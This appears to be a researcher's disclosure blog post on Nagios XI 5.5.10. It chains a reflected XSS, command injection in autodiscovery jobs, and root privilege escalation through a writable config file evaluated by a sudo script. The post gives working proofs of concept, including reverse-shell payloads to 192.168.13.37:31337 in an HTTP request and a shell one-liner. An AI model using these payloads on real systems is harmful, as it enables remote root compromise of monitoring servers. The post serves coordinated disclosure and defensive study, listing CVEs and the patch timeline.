# Nagios XI 5.5.10: XSS to \# ## tl;dr A remote attacker could trick an authenticated victim (with "autodiscovery job" creation privileges) to visit a malicious URL and obtain a remote root shell via an authenticated Remote Code Execution (RCE) and a Local Privilege Escalation (LPE). ## introduction A few months ago I read about [some Nagios XI vulnerabilities](https://medium.com/tenable-techblog/rooting-nagios-via-outdated-libraries-bb79427172) which got me interested in studying it a bit by myself. Fortunately, around the same time the team I am part of in Shielder chose to start dedicating one week each month to research projects or 0day discovery. These vulnerabilities are part of the ones I have found during that week, you can read about all of them at the [security disclosures](https://www.nagios.com/products/security/) page. My target was to find an unauthenticated remote code execution with zero interaction needed, which I couldn't find in that time span, maybe I'll have a second look sometime in the future :-) ### disclaimers - these vulnerabilities were found during [18-22]/02/2019, this blogpost is based on my notes and memory -- if you find anything inaccurate leave a comment and I'll correct it - filepaths and line numbers reported here are related to version 5.5.10, they might have changed since then - comments in the code reported here have been written by me - I haven't checked the patches to these vulnerabilities ¯\\\_(ツ)_/¯ - I haven't investigated which release(s) introduced these vulnerabilities ## table of contents 0. first look at the source code 1. XSS to RCE 2. $ to \# 3. one cl1ck one r00t 4. final notes ## 0. first look at the source code Nagios offers quite [a few options](https://www.nagios.com/downloads/nagios-xi/) in order to try Nagios XI, with a 60 days trial which allows you to understand the architecture and try all the functionalities. During my test I used the OVA provided, however I suppose that's a standard installation and the other options are the same. By reading the code used on the web interface we can see a lot of files are not obfuscated and seemingly even commented. The first vulnerability I've found is a reflected XSS through an iframe tag creation, which is at `nagiosxi/basedir/html/includes/pageparts.inc.php` line 552 function `get_window_frame_url()`: ```php [...] $xiwindow = grab_request_var("xiwindow", ""); // <- this reads the GET/POST parameters, the second arg is the fallback value if ($xiwindow != "") { $rawurl = urldecode($xiwindow); } [...] $a = parse_url($rawurl); if (isset($a["host"])) { [...] } else { $windowurl = $a["path"] . "?"; } [...] return encode_form_valq($windowurl); ``` Since `parse_url()` can be tricked into parsing a malicious URL via the `xiwindow` parameter, we can inject any URL in the resulting iframe `src` attribute: ```bash $ php -r 'var_dump(parse_url("a:javascript:alert(1)//"));' array(2) { ["scheme"]=> string(1) "a" ["path"]=> string(21) "javascript:alert(1)//" } ``` ### PoC http://nagiosxi.local/nagiosxi/about/index.php?xiwindow=a:javascript:alert(1)// ## XSS to $ Now that we have the privileges of an authenticated user we can start looking at the authenticated pages. As the [documentation suggests](https://assets.nagios.com/downloads/nagiosxi/docs/Using-Auto-Discovery-In-Nagios-XI.pdf) autodiscovery jobs allow a user to setup a scheduled scan of a specific subnet, along with many other options. That functionality resides at `nagiosxi/basedir/html/includes/components/autodiscovery/autodiscovery.inc.php`, at line 191 there's an interesting function called `autodiscovery_component_get_cmdline`: ```php function autodiscovery_component_get_cmdline($jobid) { [...] $system_dns = grab_array_var($jarr, "system_dns", "off"); // <- this comes from the user [...] if ($system_dns == "on") { $system_dns = "--system-dns=1"; } [...] $cmd = "rm -f " . $xml_file . "; touch " . $watch_file . "; sudo /usr/bin/php " . $script_dir . "autodiscover_new.php --addresses=\"" . escapeshellcmd($address) . "\" --exclude=\"" . escapeshellcmd($exclude_address) . "\" --output=" . $xml_file . " --watch=" . $watch_file . " --onlynew=0 --debug=1 " . $osd . " " . $topod . " " . $scan_delay . " " . $system_dns . " > " . $out_file . " 2>&1 & echo $!"; return $cmd; } ``` I know, this code looks *super-vulnerable*™, but if you analyze it most of the time the inputs are sanitized at different steps (many times using [escapeshellcmd](https://www.php.net/manual/en/function.escapeshellarg.php?yeah-i-know-they-are-swapped-eheh) instead of [escapeshellarg](https://www.php.net/manual/en/function.escapeshellcmd.php)) and the exploitability level is lower than it seems. As you can see the `system_dns` parameter ends up in the command line string which is going to be executed. The other variables which end in the string are sanitized, not under user-control or called differently than the user-supplied ones so this "trick" doesn't work. ### PoC ``` POST /nagiosxi/includes/components/autodiscovery/?mode=newjob HTTP/1.1 Host: nagiosxi.local Content-Type: application/x-www-form-urlencoded Content-Length: 310 Connection: close Cookie: nagiosxi=8rspko6npt4lkfqcvo9u5i70b2 update=1&job=-1&nsp=d333dca41f296fae9327eecdce86332176ed6bfc82c352e3276751ecedd6f172&address=192.168.1&exclude_address=&frequency=Once&hour=09&minute=00&ampm=AM&dayofweek=1&dayofmonth=1&os_detection=on&scandelay=&system_dns=%3bbash+-i+>%26+/dev/tcp/192.168.13.37/31337+0>%261%3b&topology_detection=&updateButton= ``` Now we have command execution as `apache:nagios`. ## $ to \# It is possible to escalate our privileges to root by exploiting the script `/usr/local/nagiosxi/scripts/repair_databases.sh` which is runnable as root by our user without password, as `sudo -l` states. Reading that script we find on line 12: ```bash [...] BASEDIR=$(dirname $(readlink -f $0)) # /usr/local/nagiosxi/scripts [...] eval $(php $BASEDIR/import_xiconfig.php) # wow, this looks dangerous [...] ``` We do not have write privileges on that file, but let see what it does: ```php [...] require_once("/usr/local/nagiosxi/html/config/config.inc.php"); [...] ``` For those of you not familiar with PHP, all [require_once](https://www.php.net/manual/en/function.require-once.php) does is interpret the source code of another file during the interpretation of the current file. It is useful in modular and object-oriented projects. Checking the permissions on such file confirms we do have read/write privileges: ```bash $ ls -lah '/usr/local/nagiosxi/html/config/config.inc.php' -rw-rw-r--. 1 nagios nagios 8.4K Feb 18 18:38 /usr/local/nagiosxi/html/config/config.inc.php ``` We can poison it in order to inject arbitrary commands during the `repair_databases.sh` script execution and obtain root privileges. ### PoC ```bash $ echo 'print("bash -i >& /dev/tcp/192.168.13.37/31337 0>&1;");' >> '/usr/local/nagiosxi/html/config/config.inc.php' && sudo /usr/local/nagiosxi/scripts/repair_databases.sh ``` ## one cl1ck one r00t These vulnerabilities can be chained together in order to craft a malicious URL which when visited by a victim (authenticated in Nagios XI and with the 'autodiscover job' privileges) is going to trigger our vulnerabilities and provide us with a remote root shell. PoC creation is left as exercise for the reader :-) ## final notes As I said earlier, by looking at the source code the security bugs **seems** to be patched on single vulnerabilities basis instead of implementing a *safe* way or guidelines to do common actions (such as executing CLI commands). However, that's just a feeling I got by reading about the [historical security bugs](https://www.nagios.com/products/security/) and the source code itself, the reality might be different. That said, the communication with the developers was really smooth and they released a patch quickly. ### timeline 20/02: - ---> 20/02 1st report sent - <--- ACK 25/02: - ---> 25/02 2nd report sent - <--- ACK - Released Nagios IM 2.2.7 with fixes for 2nd report 27/02: MITRE assigned these CVEs: 1st report: - CVE-2019-9164 --> Remote code execution via new autodiscovery job - CVE-2019-9165 --> SQL Injection via API and malicious user id - CVE-2019-9166 --> Privilege escalation apache:nagios -> root - CVE-2019-9167 --> XSS in iframe creation 2nd report: - CVE-2019-9202 --> Remote code execution in Nagios IM - CVE-2019-9203 --> Authorization bypass in Nagios IM - CVE-2019-9204 --> SQL Injection in Nagios IM 28/02: - released Nagios XI 5.5.11 with fixes for 1st report XY/04: - public release